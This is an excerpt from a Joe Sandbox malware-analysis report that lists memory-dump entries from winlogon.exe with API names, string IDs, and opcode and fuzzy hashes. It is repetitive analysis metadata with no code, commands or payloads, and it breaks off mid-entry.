                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: e1da5454589ae589727566414135aba046387261922def3505f63e54200d3d87
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: A8115736B50F088AFB00CF60E8547A833A4FB58758F840E21EA2D867A8DF78D15583C2
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: a1ec85385bb10c050ff026c888441d939cb2e74fe620a6861c714d04218da524
                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: 0371C037A84B8956F7369E26D940BEA7794FF84789FD10016DD0963B88DA36C50287C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: 8d43051fae0432339c287c2151160f3a64fceb99f59810b575694d931f32b1a0
                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: 5371F733A8474591FB369E2A9841BEA7794FF44788F90801AED0953B84DE37C606C7C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: 5d50e4c69690dc07a888c6352a7c53a26a02212cebad6fb895a16883e0e52a6b
                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: C371C537A40B9951F7369E26D864BEA7794FB84B8AF85101ADD0943B88DE76C600C783
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000003.1732974344.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_3_1ca7d1b0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3242871069-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: fd78e535435ffec6a742ccc5ca62527ce80d22f415176f15bbae23ba0b9d84d4
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 6C518133B52B088AFB55DF15D444FA83391FB44F9CF954129AA4D47B88D77AC841C782
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000003.1732974344.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_3_1ca7d1b0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CallTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3163161869-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: b460edc10a65c72ae55a20d42f54f48aa37f6c81a21e5efe8d7f1e1a140c3131
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: 9161A333908BC882E7729F15E440BDAB7A0FB85B98F444215EB9C47B99CB79D191CB42
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: d06f1d6a4c4548bdff1e7c612d8bf8de8a9f368b65ed0bfbfd455b76740dd300
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: 30511637A8878841F626CE26A454BEA7751FF84789FC60025ED4973B89DA37C406C7C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: 1df65754e96209d10ce77b496f8102a845f38ec8baad36118dacfef27c9bbe4a
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: B8511537A84389C1FA268E25A455BEB7751FF84788F948229ED4903B89DA37C403C7C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: 543a74f7f096710a94370db433aa404daddb7db03a989235164fc2747e9da801
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: 9C513837E8479841F626CE25A464BEA7791FBA8B89FD40069DD4943B89DE37C500C7C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: 2c1d7f038cfc8afa535b49b84af1afe38805e8b2e7a7ce4dff7cd2b815606423
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: E1410973A15B8886F751CF25E804BDAB7A0FB88788F844021EE4D9B744EB39C502C7C2
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: d46591c1412a96a10cecd863ef609a76f42ec2867853ab4bfb7008d3bc80fece
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: 7341C633A1578886F7218F25E444BDAB7A4FB58788F854121FA4D87754EB3AD402C7C6
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: 168bd5042619de978051ce00469c6fab8e07dcb428ef58c1d872ee4ec8472086
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: A741F633A16B8886F711DF65E404BD9B7A0FB98798FC04121EE8D87758EB39C441CB82
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: 4851d813fab70bc34ea02260f48b8835ec91dfadefddb3b7f09ec63637b0023d
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: B9115E32614B4482EB218B15F40468A77E5FBC8B98FA84224EE8D07B58DF3DC552CB81
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: 517ae6d43ddc074c8658f2a788c9059df09fd0698180bc9205b6b9a099bd701b
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: 34116033614B4482EB228F15F40469977E5FB88B98FA88224EE8D07754DF3EC552CB81
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: 2c9b86ec9324a70017c97faafd6a1d8197db821130e30e04182a7cd2d4a5eeb9
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: 4E116D73615B8482FB228F15F404689B7E1FB88B98F984220EE8D47B64DF3DC551CB42
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: 6f79bdca26009a9ee4067a207548d913ca885e6906045b0f798edfce7c91817a
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: B311A132F41B8885FA16CB67A40459A77A0FBC8FC5F984028DE4E57724DF3AC4438382
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: 94fdc9e09a08f213f1bc6ccc5a98238e785e2224b4f0dd50957134c3d91f74e5
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: A011A132F01B8881FA16CB66A40959977A0FBC9FD4F998128DE4E53724DF3AD4438386
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: e1af4d63e573468e5d58cd1c053f447371db77335f721c67b8fdd4aa0972600e
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: 3D11A132E05B8881FB16CB66E40899977B0FB88FC5F994024DE4E53764DF39D5828341
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: 32f83ff9894d743aa2ecb00ca60260912a8aebc8456aa75ed97ca70b7629fe4d
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: A1E03032A416089AF7158B52D80879A36E1FBC8B09F848014CD090B350DF7EC49A87C2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: 839ec4f0ffbd96bf49ac46d9521be995a92d04ba0fb748254b619ef769a1f32e
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: 0CE03932A416089AF7158B62D80979936E1FB88B19FC6C024C90907350EF7ED49A87C2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: 8e9949c7d491d186b10d6f9a7e37656757b2784cb481f8207ee02abd3ddac45a
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: C8E06572A427089AF715CF52D81878936E1FF88F0AF85C014C90907350DF7ED5998782
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
